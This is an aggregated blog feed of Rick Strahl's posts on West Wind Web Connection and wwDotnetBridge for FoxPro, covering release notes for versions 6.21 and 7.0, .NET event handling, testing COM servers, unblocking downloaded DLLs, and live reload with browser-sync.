Quantcast
Channel: Rick Strahl's FoxPro and Web Connection Weblog
Viewing all 133 articles
Browse latest View live

Web Connection 6.21 is here

$
0
0

We've released Web Connection 6.21 which is a relatively small update that has a few bug fixes and operational tweaks.

There are also a few new features, one of which is not Web specific but a very useful generic FoxPro enhancement feature.

  • wwDotnetBridge now supports Event Handling for .NET Objects
  • New .NET Runtime Loader for wwDotnetBridge
  • Console command for Disable Loopback Check

As always registered users of version 6.x, can download free registered version updates with download information that was sent by email. To check out Web Connection you can always pick up the shareware version:

Event Handling for wwDotnetBridge

This is a cool feature that opens up additional features of .NET to FoxPro. You can now use wwDotnetBridge to handle .NET events in an asynchronous manner. Similar to the behavior of async method calls that was introduces a few releases back you can now handle events in .NET and get called back, without having to register the .NET component and implement a COM interface.

This was previously not possible or at the very least required that you created a COM object and interface that mapped the .NET type and was registered. With this new functionality you can now use only wwDotnetBridge without any sort of special registration or even having to implement a FoxPro interface. You can simple create a proxy object that can handle select events that you choose to handle. Other events are simple ignored.

So what can you do with this? Here are a few example ideas:

  • Use SMTPClient natively and get notified on Progress events
  • Use WebClient and get notified of Web Events
  • Use the FileSystemWatcher on a folder and be notified of file updates

Basically most components that use events can now be used with wwDotnetBridge!

This feature was landed in the OSS version of wwDotnetBridge by a contributor, Edward Brey, who did most of the work for the event handling. Thanks Ed!

An Example

The following is an example using the .NET FileSystemWatcher object which allows you to monitor any file changes and updates in a given folder and optionally all of its subfolders.

The following monitors all changes in my c:\temp folder and all its subfolders which includes my actual Windows Temp folder - meaning it's a busy folder, lots of stuff gets written to temp files in Windows, so this generates a lot of traffic.

CLEAR
LOCAL loBridge as wwDotNetBridge
loBridge = GetwwDotnetBridge()

*** Create .NET File Watcher
loFW = loBridge.CreateInstance("System.IO.FileSystemWatcher","C:\temp")
loFw.EnableRaisingEvents = .T.
loFw.IncludeSubDirectories = .T.

*** Create Handler instance that maps events we want to capture
loFwHandler = CREATEOBJECT("FwEventHandler")
loSubscription = loBridge.SubscribeToEvents(loFw, loFwHandler)

DOEVENTS

lcFile = "c:\temp\test.txt"
DELETE FILE ( lcFile )  
STRTOFILE("DDD",lcFile)
STRTOFILE("FFF",lcFile)

* Your app can continue running here
WAIT WINDOW

loSubscription.Unsubscribe()

RETURN


*** Handler object implementation that maps the
*** event signatures for the events we want to handle
DEFINE CLASS FwEventHandler as Custom

FUNCTION OnCreated(sender,ev)
? "FILE CREATED: "
?  ev.FullPath
ENDFUNC

FUNCTION OnChanged(sender,ev)
? "FILE CHANGE: "
?  ev.FullPath
ENDFUNC

FUNCTION OnDeleted(sender, ev)
? "FILE DELETED: "
?  ev.FullPath
ENDFUNC

FUNCTION OnRenamed(sender, ev)
LOCAL lcOldPath, lcPath

? "FILE RENAMED: " 
loBridge = GetwwDotnetBridge()

lcOldPath = loBridge.GetProperty(ev,"OldFullPath")
lcPath = loBridge.GetProperty(ev,"FullPath")
? lcOldPath + " -> " + lcPath

ENDFUNC

ENDDEFINE

How does it work?

The event handling is based on a simple callback mechanism that uses a FoxPro event handler that is passed into .NET to be called back whenever an event occurs. The behavior is similar to the way the BINDEVENT() works in FoxPro with a slightly more explicit process.

Allows you to capture events on a source object, by passing in a callback handler that maps the events of the target object with corresponding methods on the handler.

To handle events:

  • Create an Event Handler Object
    Create a Custom class that implements methods that match the events of the .NET object that fires events with a On<EventName> prefix. Each 'asdd' method's parameters should match the parameters of the .NET event delegate. You only need to implement the methods you want to listen to - other events are ignored.

  • Create an Event Subscription
    Call loBridge.SubscribeToEvents() which binds a .NET event source object to a FoxPro event handler.

  • Continue running your Application
    Events are handled asynchronously in .NET and run in the background. Your application continues running and as events fire in .NET, the On<Event> methods are fired on the Event Handler object in FoxPro.

  • Unsubscribe from the Event Subscription
    When you no longer want to listen to events, call loSubscription.UnSubscribe(). Make sure you do this before you exit FoxPro or you may crash VFP on shutdown.

The key here is that you have to make sure that the .NET object that you want to handle events on as well the event handler stay alive because they essentially run in the background waiting for events to fire. This means storing these references on permanent objects like your main application's form or the FoxPro _screen or global variables.

Events are not as prominent in .NET as they used to be back in the high flying days of UI frameworks. Few operational components fire events, but many of the core system IO services have events you can handle. Progress events and completion are common.

Now we have the tools to use these event in the same easy fashion as all other .NET access with wwDotnetBridge.

New wwDotnetBridge .NET Runtime Loader

In this release the .NET runtime loader used for wwDotnetBridge has been updated to use the latest loader specific for .NET 4.0 and later. In past years we weren't able to use the new loader because the older versions still loaded .NET 2.0, but with the switch to 4.5 recently we can now take advantage of the new loader.

There are a couple of advantages here. The new loader is the officially recommended approach and provides a cleaner path to runtime loading, and more importantly it provides more error information. Previously the error information available from CLR loading was very cryptic as the runtime did not report the underlying error only a generic load failure error. The new version reports the underlying error information which is now passed to wwDotnetBridge.

This feature was also landed by Edward Brey in the OSS version of wwDotnetBridge.

Console Command for disabling the Loopback Check Policy for Authentication on Servers

On servers and now also on newer versions of Windows 10 (?), IIS enforces local loopback check policy which doesn't allow for local Windows authentication to work. If you try to access the Admin pages with authentication it will fail if the policy is applied. This can be a real pain when accessing the Web Connection Admin pages which by default rely on Windows Authentication to allow access to the Admin functionality.

The problem manifests if you try to login - you will not be able to use valid login credentials to actually authentication. Instead you get 404.3 errors which are auth errors.

Windows Servers have a policy that explicitly enable this Loopback Checking policy that effectively disables Admin access. Recently I've also noticed that on Windows 10 1803 I also couldn't access local addresses when using custom mapped local domains (ie. test.west-wind.com mapped to my localhost address).

There is a workaround for this issue by using a registry hack. This release now has a Console function that lets you set this registry setting without having to hack the registry manually:

console.exe DisableLoopbackChecking

I also wrote up a blog post with more information today:

Release Summary

Besides the marquee features, there are just a few small tweaks and bug fixes to the core libraries.

To see all that's changed in recent versions:

As always, let us if you have questions or run into issues with new features or old on the message board:

Enjoy...

this post created and published with Markdown Monster

Testing a Web Connection COM Server with FoxPro or PowerShell

$
0
0

This is a quick tip to a question that comes up frequently when testing runtime installations:

How can I quickly test whether my COM server is properly installed and working on a live server where I don't have the full Visual FoxPro IDE installed?

If you recall when you install Web Connection on a live server the preferred mode of operation is by using COM Mode where Web Connection servers are running as COM objects. If you ever run into a problem with a COM server not loading the first thing you want to do is check whether the COM server can be loaded outside of Web Connection either using a dedicated FoxPro IDE installation or if you only have the FoxPro Runtimes available using PowerShell.

Registering your COM Server

The first step for COM servers on a new server is that that they have to be registered in the Windows Registry. When you build during development Visual FoxPro automaqtically registers the COM server during build, but on a live server install you manually have to install the server.

Assuming you have an EXE server called MyApp, you can register your server using the following from a Command or PowerShell prompt running as an Administrator:

MyApp.exe /regserver

COM registration requires Admin access because the registration data is written into the HKEY_LOCAL_MACHINE key in the registry which is writable only as an Admin user. On a server this usually isn't an issue as you typically are logged on as as an Admin user, but on a local dev machine you typically need to start Command or PowerShell with Run As Administrator.

The /regserver Switch produces no Output

One problem with the /regserver switch is that it gives absolutely no feedback. You run it on your EXE and it looks like nothing happened regardless of whether it succeeded or failed. No output, no dialog - nothing.

COM Registration is Automatic with Web Connection Configuration Tooling

Note that if you're using the new Web Connection self-configuration tooling for applications using YourServer_Config.prg or Youserver.exe CONFIG, the COM registration is automatically run for you, so you don't have to manually register the server.

The naming of the server by default will be MyApp.MyAppServer - the naming is based on the project name plus the OLEPUBLIC server class name which is auto-generated when the project is created. Keep in mind that if you change names, of the project or class the COM server name will also change, which can break existing installations.

When it's all said and done you should have a COM server registered as MyApp.MyAppServer.

Re-Register COM Servers when the Server Interface Changes

Note that COM server registration is always required on first installation, but also when you make changes to the public COM interface of the server. COM registration writes ClassIds, ProgIds and Type library information into the registry and if the COM interface changes these ids often change along with the interface signatures. So remember to re-register your servers whenever properties or methods on the Server class are added or changed.

Testing the Server

So, to test the server and see if it's actually working, you can do the following using FoxPro code:

loServer = CREATEOBJECT("MyApp.MyAppServer")
? loServer.ProcessHit("")   && produces an error HTML page if it works

This produces an error page with a 404 Not Found header because no path was passed. This is usually all you need to check whether the server can load and run. It's easy to run and remember.

If you want to see a real response from the server you can instead specify a physical path to the request. For example, to test the Web Connection sample server I can do:

loServer = CREATEOBJECT("wcDemo.wcDemoServer")
? loServer.ProcessHit("&PHYSICAL_PATH=c:\wconnect\web\wconnect\testpage.wwd")
loServer = null

which should produce the output of the testpage.

Note it'll depend on the URL you hit whether additional parameters like query strings, form variables or other URL parts are required, but if you fire a simple GET request it should typically work.

No FoxPro Installation? Use PowerShell

On a live server however you often don't have the FoxPro IDE installed, so if you want to test a COM server you can't use FoxPro code. However, Windows Powershell can instantiate COM objects (and also .NET objects) and so we can use a powershell script to test the server.

$server =  new-object -comObject 'yourProject.yourProjectServer'
$server.ProcessHit("")

This should produce an HTML error page with an HTTP 404 response header that says page not found.

If you want to test a 'real' request, you can provide a physical path - here again using the Web Connection sample server as an example:

$server =  new-object -comObject 'wcDemo.wcDemoMain'
$server.ProcessHit("&PHYSICAL_PATH=c:\wconnect\web\wconnect\testpage.wwd")

# release the server (optional)
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($server) | Out-Null

Note the rather nasty syntax to release a COM server from memory. Alternately you can shut down the PowerShell session to release the object as well.

Summary

Testing COM objects on an installed server is something that is often needed if you are troubleshooting an installation. A FoxPro installation is easiest, but if you only have a runtime install the PowerShell option is a good and built-in alternative.

Fixing Windows Downloaded File Blocks and wwDotnetBridge

$
0
0

This is kind of a 'good to know' technical post that discusses some backround information around wwDotnetBridge and one of the biggest issues with using it. In this post I'll talk about Windows Download File Blocking due to Zone Identifier marking, along with a solution on how to programmatically unblock files easily, the fix for which will start showing up in version 6.22 of wwDotnetBridge going forward.

If you arrived here and don't know what wwDotnetBridge is, it's a bridge interface for accessing .NET from FoxPro without requiring COM instantiation. wwDotnetBridge hosts the .NET Runtime in FoxPro and provides a Proxy wrapper that can create instances of objects, call static methods, handle events, access generic members, deal with arrays and collections efficiently and provides a ton of helpers to access features of .NET that COM Interop can't.

Glowing features aside, in this post I'm talking about the #1 problem that surrounds wwDotnetBridge which is the dreaded Windows File Blocking Issue. This issue is caused by files downloaded from the Internet either directly or in a Zip file that Windows has marked as Blocked.

A blocked file cannot be loaded into .NET over an AppDomain boundary, which in turn causes wwDotnetBridge to fail to load the .NET Runtime properly. It's a big fail and while there are easy solutions, to date I hadn't been able to automate it away. That is until today - I'm happy to say that I've found a solution to this problem. Better late than never ??

What's the Problem? Blocked files and wwDotnetBridge

For wwDotnetBridge blocked files are a big problem, because if you download wwDotnetBridge from Github or from West Wind Client Tools you are downloading a Zip file which when unzipped creates - you guessed it - blocked DLL files.

What File Blocking Does

This is a 'protection' feature of Windows, which associates a Zone Identifier stream with a given file name using something known as Alternate Data Streams (ADS). When you download a file to your Downloads folder and that adds the Zone Identifier alternate data stream in yourfile.dll:Zone.Identier. If you download a Zip file, the contents of the Zip file - any executables - are marked as well. Once the zone identifier exists it's moved along with the file if you copy it to another location on the local drive. This is all handled by the file system.

How that Zone indicator is used is up to the host application. It turns out FoxPro doesn't care about it and I can reference a DECLARE DLL and it works just fine. For example, even when marked as 'blocked', wwIPStuff.dll works just fine in FoxPro without first unblocking.

However, the .NET Runtime as part of hte bootstrapping process does care about Zone Identifiers, so when wwDotnetBridge passes wwDotnetBridge.dll to the .NET Runtime/AppDomain as the runtime entry point assembly, it checks the Zone Identifier and refuses to load the dll.

What Blocking looks like with wwDotnetBridge

When wwDotnetBridge is run with a blocked wwDotnetBridge.dll file you will get an error. Running this most basic code:

DO wwDotnetBridge
loBridge = GetwwDotnetBridge()
loBridge.GetDotnetVersion()

will fail with an Unable to load CLR Instance error in the Load() method like this:

Note that this particular returns no error in lcError because the runtime that normally returns an error is not actually loaded yet. Instead wwDotnetBridge provides an error message with the most likely scnearios and a link to the docs.

In order to get wwDotnetBridge to run wwDotnetBridge.dll first has to be unblocked - which has been the cause of innumerable support requests.

Blocked only for Downloaded Files Or Downloaded Zip Archives

Note that this error occurs only if running a downloaded wwDotnetBridge.DLL either directly or inside of a ZIP file. So it happens with the GitHub and West Wind Client Tools zip files, but it does not with Web Connection and Html Help Builder because both of these tools use an installer which never flags these files with the Zone Identifier responsible for the blocked files.

Unblocking - Powershell

It turns out that unblocking is a common administration task in Windows and Powershell has a dedicated commandlet for it:

PS> unblock-file -Path '.\wwDotnetBridge.dll'

You can run that command and it will unblock the DLL and the error goes away. It's not an Administrative task either so even a standard user can run this command. Easy, but not exactly automatic.

I played around with this by running load, checking for a specific error and if I see it unblocking using the PowerShell command from within FoxPro:

lcPath = FULLPATH("wwdotnetbridge.dll")
lcCmd = [powershell "Unblock-File -Path '] + lcPath + ['"]
RUN /N7 &lcCmd 

While this works to unblock the file, this process is slow (shelling out) and once unblocked I still have to quit FoxPro or my application to see the newly unblocked DLL - a retry to reload still fails in the same VFP session. So while it works I still see at least one initial failure.

Close but no cigar.

Unblocking - Deleting the Zone Stream

After a bit of research it turns out that there's a more direct way to unblock a file which involves deleting a special file in the Windows file system. This Alternate Data Stream can't be deleted using FoxPro's ERASE FILE so we have to use the Windows API DeleteFile() function instead. Easy enough:

*** Remove the Zone Identifier to 'Unblock'
DECLARE INTEGER DeleteFile IN WIN32API STRING		  			  			
DeleteFile(FULLPATH("wwDotNetBridge.dll") + ":Zone.Identifier")

*** To be extra sure - unblock other dependencies
DeleteFile(FULLPATH("newtonsoft.json.dll") + ":Zone.Identifier")
DeleteFile(FULLPATH("markdig.dll") + ":Zone.Identifier")

Et voila!

This code clears the Zone Identifier which is responsible for the Block on the file.

Deleting effectively unblocks the dll and if the identifier doesn't exist DeleteFile() quietly fails. And because it's a Windows API call it's also relatively fast - quick enough that I can run it every time wwDotnetBridge is instantiated just to be sure the zone identifier isn't present.

So now that code is called as part of the load sequence in wwDotnetBridge which should do away with the blocked DLL issue for good. Yay!

What about other blocked DLLs

Please note that the only DLL affected is wwDotnetBridge.dll. wwIPStuff.dll and Newtonsoft.json.dll and markdig.dllwork fine without unblocking. The reason is wwDotnetBridge.dll is initial .NET DLL loaded containing the wwDotnetBridge type when the .NET Runtime is bootstrapped in this code:

lnDispHandle = ClrCreateInstanceFrom(FULLPATH("wwDotNetBridge.dll"),;"Westwind.WebConnection.wwDotNetBridge",@lcError,@lnSize)

Depending on your security setup you may still have to set LoadFromRemoteSources in your config file. I generally recommend you always add the following in a yourapp.exe.config and in your vfp9.exe.config (in the VFP install folder) to make .NET behave like other Win32/64 applications when it comes to network access:

<?xml version="1.0"?><configuration><runtime><loadFromRemoteSources enabled="true"/></runtime></configuration>

The ClrCreateInstanceFrom() in wwIpStuff.dll basically loads the .NET runtime, creates a new AppDomain, then loads the wwDotnetBridge .NET type from wwDotnetBridge.dll into it over AppDomain boundaries. This crossing of AppDomain boundaries before .NET policies are applied at this system level is what likely triggers the error in the first place.

A Big Load Of My Back!

This Windows file blocking has been a major thorn in my side and one of the sticking points around wwdotnetbridge adoption. As a new user when you're just kicking the tires the last thing you want to see is a nasty unspecific error on first launch. Even though this problem is prominently documented, most people don't look at the documentation carefully so it's easy to miss this.

Now, with this feature added to the latest wwDotnetBridge (not quite released yet) it should be much easier to get started with wwDotnetBridge regardless where the installed version comes from.

Using Browser-Sync to live refresh Server Side HTML and Script Changes

$
0
0

Client side applications have been using Live-Reload behavior forever. When building Angular or Vue application I don't give a second thought to the fact that when I make a change to an HTML, Typescript/JavaScript or CSS file anymore and I expect the UI to reflect that change by automatically reloading my browser with those changes. This workflow makes it incredibly productive to iterate code and build faster.

Unfortunately the same cannot be said for server side code. When making changes to script pages in Web Connection I make a change, then manually flip over to the browser to review the change. While it's not the end of the world, it's much nicer to have a browser side by side to my editor and see the change side by side.

Linking Browser and File Watchers

If you haven't used client side frameworks before and you don't know how browser syncing works here's a quick review. Browser synching typically works via tooling that does two things:

  • File Change Monitoring
  • Updating the browser

File monitoring is easy enough. A file system watcher monitors the file system for any changes to files you specify via a set of wildcards typically. If any of these files are changed the watcher will kick in to perform an action.

Depending on what you care about this can be as simple as simply reloading the page, or in the case of actual code files requires a rebuild of an application.

ASP.NET Core actually includes a built-in file watching tool called dotnet-watch which you can run to wrap the dotnet run command. But it only handles the recompilation part, not the browser refresh.

The other part of the equation is refreshing the browser. In order to do this any tool need to load the browser and inject a little bit of code into each page loaded in the browser to essentially communicate with a server that allows reloading the active page. This typically takes the form of a little WebSocket based server that runs in the Web page and communicates with a calling host - typically a command line tool or something running in developer tools like Browser-Link does in Visual Studio.

As mentioned Browser-Link in Visual Studio seems like it should handle this task, but for me this technology never worked for server side code. I've only got it to work with CSS file which is actually very useful - but it would be a heck of a lot more useful if it worked with all server side files even if it was just uncompiled files like HTML, JavaScript and Server side views that auto-recompile when they are reloaded. Alas no luck.

Browser-Sync to the request

Luckily we don't have to rely on Microsoft to provide a solution to this. There are a few tools out there that allow browser syncing externally from the command line or via an admin console in a browser.

The one I like best is Browser-Sync. Most of these tools are nodejs based so you'll need Node and NPM to install them, but once installed you can run them from the command line as standalone programs. Browser Sync does a lot more than just browser syncing.

In order to use Browser Sync you need a few things:

  • Install NodeJS/NPM
  • Install Browser Sync using NPM
  • Fire up Browser Sync from the Command Line
  • Let the games begin

As is common with many Web development related tools Browser Sync is built around NodeJS and is distributed via NPM, so make sure NodeJs is installed.

Next we need to install Browser-Sync. From a command prompt do:

npm install -g browser-sync

This installs a global copy of browser sync which can be run just like an executable that is available on the Windows path.

Now, in your console, navigate to the Web folder of your application. I'll use the Web Connection sample here:

cd \wconnect\web\wconnect

Next startup browser sync from this folder:

browser-sync start 
		--proxy localhost/wconnect 
		--files '**/*.wcs,**/*.wc, **/*.wwd, **/*.md, **/*.blog, css/*.css, scripts/*.js'

This command line basically starts monitoring for file changes in the current folder using the file spec provided in the files parameter. Here I'm monitoring for all of my scriptmapped extensions for my Web Connection scripts as well as CSS and JavaScript files.

Note the --proxy localhost/wconnect switch which tells browser-sync that I have an existing Web Server that's running requests. Browser-Sync has its own Web Server and when running NodeJs applications you can use it as your server directly. However, since Web Connection doesn't work with Node I can the -proxy switch to point to my application's virtual directory which is http://localhost/wconnect/. If you're using IIS Express it'd be --proxy localhost:54311. The proxy feature will change your URL to the proxy server that browser-sync provides, typically localhost:3000.

Here's what this looks like when you run browser sync:

Browser sync automatically navigates to http://localhost:3000/wconnect and opens the browser for you.

Now go to the No Script sample at wcscripts/noscripts.wcs page and open it. Next jump into your editor of choice and make a change to the page - change title to Customer List (updated) and save.

The browser updates immediately without an explicit refresh:

Now go back and remove the change... again the browser refreshes immediately.

Et voila, live browser reload! Nice and easy - cool eh?

Making Browser Sync easier to load

For tools like this I like to make it easy, so I tend to create a small program that loads browser sync with a single command. Here's a simple script I drop into my project folder to launch brower sync:

************************************************************************
*  BrowserSync
****************************************
***  Function: Live Reload on save operations
***    Assume: Install Browser Sync requires Node/NPM:
***            npm install -g browser-sync
***      Pass:
***    Return:
************************************************************************
FUNCTION BrowserSync(lcUrl, lcPath, lcFiles)

IF EMPTY(lcUrl)
   lcUrl = "localhost/wconnect"
ENDIF
IF EMPTY(lcPath)
   lcPath = LOWER(FULLPATH("..\web\wconnect"))
ENDIF
IF EMPTY(lcFiles)
   lcFiles = "**/*.wcs,**/*.wc, **/*.wwd, **/*.blog, css/*.css, scripts/*.js, **/*.htm*"
ENDIF

lcOldPath = CURDIR()
CD (lcPath)

lcBrowserSyncCommand = "browser-sync start " +;"--proxy " + lcUrl + " " + ;"--files '" + lcFiles + "'"
RUN /n cmd /k &lcBrowserSyncCommand

? lcBrowserSyncCommand
_cliptext = lcBrowserSyncCommand

WAIT WINDOW "" TIMEOUT 1.5
CD (lcOldPath)

ENDFUNC
*   BrowserSync

And now I can simply launch browser sync with a simple command from the FoxPro command window:

DO browsersync

Installed with Web Connection 6.50

As of Web Connection 6.50 new projects auto-generate a browsersync.prg file into the code folder, so if you have BrowserSync installed you can just do browsersync to fire it up and open your site on the proxy port.

No Support for Web Connection Process Changes

Browser sync works great for any content that lives in the Web folder structure. Unfortunately the process class lives in a separate folder hierarchy and can't be monitored there. Even if you could - the Web Connection server has to be restarted in order to see changes to the process class as those classes are not unloaded.

So for 'real' code changes you're still going to have some manual cycling time. But that's probably OK. The time consuming stuff usually revolves around the fiddly HTML and CSS manipulation and that's where browser-sync can really help make you more productive.

Caveats

I've been using Browser Sync for a while now and while it works pretty good it does get 'stuck' every once in a while. It usally starts by the browser taking a long time to refresh a page or navigate to a new one. It doesn't happen very often, but it does happen enough to mention it here. Incidentally I see the same thing happening with the WebPack dev server in Angular. These tools are pretty hacky in how they intercept traffic and refresh so I'm not surprised that the Web Socket connection gets flakey in some situations. In fact, I'm rather surprised how well it works if anything.

Once I see the browser navigating slowly or refreshing really slowly I simply kill the console window that's running the browser-sync code and I re-run DO browsersync from the FoxPro command line to start a new instance.

A couple of things that will help:

  • Try not to have multiple browser instances open to the proxy url (localhost:3000 typically)
  • Don't start multiple instances of browser sync (obviously)
  • Minimize explicit full browser refreshes (ctrl-shift-r)

Again, it's not a deal breaker, especially since it drop dead easy to stop/restart.

Summary

Browser syncing may not sound like that impressive of a feature, but I have to say that it ends up changing the way you work. I know it did for me. Because changes are immediately reflect you can much more easily experiment with small changes and see them immediately while you're editing them. This is especially useful for CSS changes that often are very fiddly, but also for script HTML layout changes.

Either way it's a great productivity enhancing tool.

Sync on...

this post created and published with Markdown Monster

West Wind Web Connection 7.0 has been released

$
0
0

The final build of Web Connection 7.0 was released today and is available for download now. You can grab the latest shareware version from the Web Connection Web site:

Upgrades and full versions are available in the store:

Also released today is the User Security Manager for Web Connection which is an add on that handles user account authentication and and profile management:

Big Release

Web Connection 7.0 is a major update that includes many enhancements and optimizations.

Here's a list of all that has changed and been added:

What follows is a lot more detail on some of the enhancements if you are interested.

Focus on Streamlining and Consolidation

This release continues along the path of streamlining relevant features and making Web Connection easier to operate during development and for deployment. As most of you know Web Connection is a very mature product that has been around for nearly 25 years now (yes the first Web Connection release shipped in late 1994!) and there is a lot of baggage from that time that is no longer relevant. A lot of stuff has of course been trimmed over the years and this version is no different.

This release consolidates a lot of features and removes many libraries that hardly anyone uses - certainly not in new project - by default. The libraries are still there (in the \classes\OldFiles folder), but they are no longer loaded by default.

The end result is a leaner installation package of Web Connection (down to 20 megs vs. 35 megs) and considerably smaller base applications (down to ~700k vs 1.1meg).

Removing VCX Casses in favor of PRG Classes

One thorn in my personal side, has been that Web Connection included a few VCX classes, specifically several VCX classes that don't really need to be visual. wwSql, wwXml, wwBusiness and wwWebServer all were visual classes that have now been refactored into PRG classes.

This is a breaking change that requires changing SET CLASSLIB TO to SET PROCEDURE TO for these classes using a Search and Replace operation.

wwBusiness is a special case as it can and often was used with Visual Classes for subclassing. So, wwBusiness.vcx still exists in the OldFiles folder, but there's a new wwBusinessObject class and wwBusinessCollectionList class that replaces it. If you already used PRG based business object subclasses then it's a simple matter of replacing the SET CLASSLIB TO wwBusiness with SET PROCEDURE TO wwBusinessObject and replacing AS wwBusiness with AS wwBusinessObject.

For visual classes you can either continue to use the VCX based wwBusiness class, or - better perhaps - extract the code of each class to a PRG file using the Class Browser and deriving classes off wwBusinessObject. For visually dropped classes that were dropped on a form or container that code would also need to be replaced with THISFORM.AddProperty(oBusObject,CREATEOBJECT("cCustomer")) and so on.

VCX Class to PRG Class Migrations

Bootstrap 4 and FontAwesome 5

Other highlights in this update include getting the various support frameworks up to date.

Web Connection 7.0 ships with Bootstrap 4 and FontAwesome 5 (free) support which updates the original versions shipped in Web Connection 6 more than 4 years ago. This is one thing that's troublesome in Web applications: Client side frameworks change frequently and as a result anything that depends on them - including a tool like Web Connection - also has to update. This process is not difficult but it is time consuming as there are a handful of places in the framework (mainly the wwHtmlHelpers) where there are dependencies on some of these UI framework specific features.

That said, having upgraded 3 different applications to Bootstrap 4 and FontAwesome 5 I can say that the process is relatively quick if you decide to upgrade. 95% of the work is search and replace related, while the remaining 5% is finding specific UI constructs and updating them (mainly related to change in Bootstrap 4's use of Card vs. panels, wells, tooltips etc.).

While it's a nice to have feature to upgrade to the latest version of UI frameworks and keep up to date with new styles and UI framework features, it's also important to understand that you don't have to upgrade to the new UI Frameworks. If you have an app that runs with Bootstrap 3/FontAwesome 4 you can continune to use those older UI frameworks - using Web Connection 7.0 isn't going to break your application.

Migration from Bootstrap 3 to 4 in the documentation.

Project Management Improvements

One of the most important focal points of this update and many changes since v6.0 have been around making Web Connection Projects easier to create, run, maintain and deploy. Web Connection 7.0 continues to make things easier and quicker and hopefully more obvious for someone just getting started.

Fast Project Creation - Ready to Run

To give you some perspective here, I use the project system constantly when I need to test something out locally. When I see a message on the message board with a question to some feature it's often easier for me to just create a new project quickly and push in a few changes than even pull a demo project and add features. Creating a new project takes literally a minute and I have a running application.

There's a new Launch.prg file that is generated that automates launching a project consistently, regardless of which project you're in.

The process now literally is:

  • Use the Console
  • Run the New Project Wizard
  • DO Launch.prg

The browser is already spun up for you and additional instructions on how to launch either IIS or IIS Express are displayed on the screen.

Launch.prg is a new file generated by the new project wizard which basically does the following:

  • Calls SetPaths.prg to set the environment
  • Opens the browser to the IIS or IIS Express Url
  • If running IIS Express launches IIS Express
  • Launches your Web Connection Server instance
    using DO <yourApp>Main.prg

You can do this to launch with IIS:

DO Launch

which opens the application at http://localhost/WebDemo (or whatever your virtual is called).

To launch for IIS Express:

DO Launch with .T.

which is a flag that launches IIS Express and changes the URL to http://localhost:7000. This is a configurable script so you can add other stuff to it that you might need at launch time.

Here's what this script looks like for the WebDemo project.

********************************************
FUNCTION Launch
***************
LPARAMETER llIISExpress

CLEAR

*** Set Environment
*** Sets Paths to Web Connection Framework Folders
DO SETPATHS

lcUrl = "http://localhost/WebDemo"

IF llIISExpress
   *** Launch IIS Express on Port 7000
   DO CONSOLE WITH "IISEXPRESS",LOWER(FULLPATH("..\Web")),7000
   lcUrl = "http://localhost:7000"
ENDIF

*** Launch in Browser
DO CONSOLE WITH "GOURL",lcUrl
? "Running:" 
? "DO Launch.prg " + IIF(llIISExpress,"WITH .T.","")
?
? "Web Server used:"
? IIF(llIISExpress,"IIS Express","IIS")
?
IF llIISExpress
   ? "Launched IISExpress with:"
   ? [DO console WITH "IISExpress","..\Web",7000]
   ?
ENDIF

? "Launching Web Url:" 
? lcUrl
? 
? "Server executed:"
? "DO WebdemoMain.prg"

*** Start Web Connection Server
DO WebdemoMain.prg

This makes it really easy to launch consistently, and for any project and whether you are running with full IIS or IIS Express.

Even if you're running an old project I encourage you to add a Launch.prg for an easier launch experience. I've been doing this for years but manually, and now that process is automated.

Launch.prg also prints out to the desktop what it's doing. It tries to be transparent so you don't just see the black box but you can see the actual commands and steps to get your app up and running easily and to allow you launch even if you don't use Launch.prg. The goal is to help new users understand what's actually going on while at the same time making things much easier and more consistent to run.

BrowserSync.prg - Live Reload for Server Code

BrowerSync is a NodeJs based tool that can automatically reload the active page in the Web browser when you make a change to a file in your Website. The idea is that you can much more quickly edit files in your site - especially Web Connection Scripts or Templates - and immediately see the change reflected in the browser without having to explicitly navigate or refresh the browser.

Using BrowserSync you can have your code and a live browser window side by side and as you make changes and save, you can immediately see the result of your change reflected in the browser. It's a very efficient way to work.

When you create a new project, Web Connection now creates a BrowserSync.prg that's properly configured for your project. Assuming browser-sync is installed, this file will:

  • Launch Browser Sync on the Command Line
  • Navigate your browser to the appropriate site and port
  • Start your FoxPro server as a PRG file (DO yourAppMain.prg)

There's more information on what you need to install BrowserSync in the documentation:

Using BrowserSync during Development to Live Reload Changes

New Project Automatically Create a GIT Repository

If Git is installed on the local machine the new Project Wizard now automatically sets up Git Repository and makes an initial commit. New projects include a FoxPro and Web Connection specific .gitignore and .gitattributes file.

This is very useful especially if you just want to play around with a project as it allows you to make changes to the newly created project and then simply rollback to the original commit to get right back to the original start state.

It's also quite useful for samples that update existing applications. For example, I recently created the User Security Manager and using the intial commit and the after integration Git lets you see very easily exactly what changes the update integration Wizard makes to get the new project running.

As a side note, Web Connection projects are very Git friendly since they typically don't include VCX files. With the v7.0 changes away from VCX wwBusiness, the last vestige of visual classes has been removed. If you use visual classes you'll need some additional tooling like FoxBin2Prg to convert visual classes to text that Git can work with for comparison and merging.

Code Snippets for Visual Studio and Visual Studio Code

Another big push in this release has been to improve integration into Development IDE's. Web Connection 7 now ships with a number of Intellisense code snippets for Visual Studio and Visual Studio Code. In both development environments you now have a host of code snippets that start with wc- to help inject common Web Connection Html Helpers as well as common HTML and Bootstrap constructs and full page templates (ie. wc-template-content-page).

In Visual Studio:

And in Visual Studio Code:

The Visual Studio Add-in also has a number of enhancements that allow hooking up an alternate code editor to view your process class code (I use Visual Studio Code for that these days).

Fixing a Script Page Path Dependency

Another highlight for me is that Web Connection Script pages that use Layout pages no longer hard code the script page path into the script page. This fixes a long standing issue that caused problems when you moved script files and specifically compiled FXP files between different locations.

In v7.0 the hard coded path is no longer present which means you can now compile your script pages on your dev machine and ship them to the server without worry about path discrepancies.

The old code used to do this sort of thing:

The result of this was that you'd get content page PRG files that had something like this:

LOCAL CRLF
CRLF = CHR(13) + CHR(10)

 pcPageTitle = "Customers - Time Trakker" 

 IF (!wwScriptIsLayout)
    wwScriptIsLayout = .T.
    wwScriptContentPage = "c:\webconnectionprojects\timetrakker\web\Customers.ttk"
    ...
ENDIF

The hard coded path is now replaced by a variable that is passed down from the beginning of the script processing pipeline which is ugly from a code perspective (a non-traceable reference basically), but clearly preferrable over a hardcoded path generated at script compilation time.

It's a small fix, but one that actually has caused a number of mysterious failures for many people that was difficult to track down because it would tell you that the script was not found even though the path presumably was correct.

So yes, this a small but very satisfying fix...

Markdown Improvements

There are also a number of improvements related to Markdown processing in Web Connection. You probably know that Web Connection ships with a MarkdownParser class that has a Markdown() method you can use to parse Markdown into HTML. The MarkdownParser class provides additional control over what features load and what processing options are applied, but in essence all of that provides basic Markdown parsing features.

